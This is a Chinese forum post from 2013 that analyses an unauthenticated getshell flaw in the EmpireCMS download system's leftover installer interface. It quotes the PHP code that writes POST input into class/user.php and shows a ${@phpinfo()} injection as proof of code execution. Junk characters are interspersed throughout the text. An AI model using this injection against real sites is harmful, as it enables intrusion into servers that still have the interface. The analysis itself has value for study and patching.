这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们1 \1 G1 u. m* ]' N6 e/ X
# |2 m+ m8 T! v( U* Y& j+ ?, G
6 R. k/ O7 r6 D% M+ s这是帝国的一套下载系统 如图% d) x- z6 P* s' G
ps(不需要任何账户和密码,直接写shell)
( U5 @2 g9 p9 ^2 }" f8 t
由于很多站是由于下载要整合discuz 等等一些论坛....5 T% c+ {. @& r/ E, \; Z( c$ S6 `
$ u1 b6 V! \* B5 W4 D而帝国他又有一个万能接口,如图 / V/ G: O7 Z O) M3 X p2 E) u
: J7 ^' V! b4 `. `, {0 m$ c( i( s
. I! O5 q( l" y0 X( f* k; D0 A) h& Y
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码4 `. T* I5 o2 F
3 l: D# x/ a6 x* {" K0 D1 _6 v
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪# v/ B6 |2 a7 D( P2 _( h% k
( p. @. M0 B z4 I' R在data/fun.php中的15行' I& L) G4 k4 E
: n; k$ R1 O7 N* o' u
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
X3 ~( t; s' E17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干0 G5 L+ w8 T9 v. L& C$ `; X( B
7 Q. R4 p' y/ W; e b( Q9 L这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
& `! V9 H [+ b; e1 X
& E) |: h. Q8 M他将传进来的变量进行了切割,然后赋给了$filetext `' V; u2 S0 p7 D+ \8 {
7 e; c! A3 \3 w$ x2 x: T# L
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了5 q+ W" L0 q0 b; O+ N4 O5 Y
( z9 o" E P; N: z我们看看写入的结果,随便填一个
- _* z( P. M2 z: ?6 Y
$ |1 @5 g# j+ b9 V: a1 r6 H7 h3 o2 t4 A- `% c
& l/ g, P2 @: g9 ]8 Y6 v$ Y
' v6 n! v5 \+ z$ N
8 ]7 n) f* g9 ~; j( R9 Q2 {7 r% C) I. q% }6 o' u9 a
5 p2 t5 Z- G+ P3 q, U) r
0 o& g2 O. K& t$ L0 s! U
Y7 U9 z6 E0 `0 Y* M
5 @+ g2 C* C" t. f3 s& k3 w+ M3 m/ v3 C; c3 q6 P) e1 B% M5 M0 Q
2 e( }. `9 F& e: a- p6 t7 V. `% U e" x) H& E$ [
' U9 z% O' @$ I. b) c* i, q, `4 D+ s8 A5 d* ^1 q( V! Y
5 j$ s8 V9 c* a7 M+ {- v! g4 N9 d
% n$ a' o- K+ ]/ W/ I* W; H: S
5 t9 u9 ]% v4 g! M! O7 f
9 c5 a" ^) |9 z8 W9 L" g W% V# d# R: M+ I# h& I
, l1 d% ?( i" g
所以我们淫荡点,写个${@phpinfo()}试试
- H& [& }5 }6 n- [/ M然后访问以下class/user.php这个文件
) e, H1 u9 e$ G6 Q& _, w+ i日了吧 $ l: Q1 J8 B( j8 D, V
- Z( b+ w6 B+ i6 M# R7 @' Q- d
& d' s: _5 x4 N( m9 N/ t
4 O p/ [0 o: z. }5 o' x5 d% m( T( s( E* F; p. T
: Z) s4 q6 o4 L& \. ]3 Y | 
发表于 2013-1-23 09:34:37
收藏
分享
支持
反对